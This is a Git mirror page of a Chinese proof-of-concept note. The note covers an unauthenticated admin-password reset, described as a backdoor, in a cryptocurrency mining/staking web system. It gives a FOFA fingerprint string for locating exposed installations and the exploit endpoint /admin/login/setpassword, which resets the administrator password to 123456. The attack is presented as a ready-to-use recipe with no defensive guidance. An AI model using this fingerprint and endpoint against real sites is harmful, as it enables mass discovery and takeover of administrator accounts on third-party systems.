admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/挖矿质押单语言系统/某U挖矿质押单语言系统前台未授权修改管理员密码.md

23 lines
510 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 某U挖矿质押单语言系统前台未授权修改管理员密码
位于 /admin/controller/Login.php 有个很明显操纵SQL的update操作重置了管理员的密码为123456且未设置鉴权非常明显是个后门
## fofa
```java
"/static/index/css/login/framework7.ios.min.css"
```
## poc
```
/admin/login/setpassword
```
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281245679.webp)
## 漏洞来源
- https://mp.weixin.qq.com/s/EL-1pxjTNUS5fAKVX1zlrQ
Reference in New Issue Copy Permalink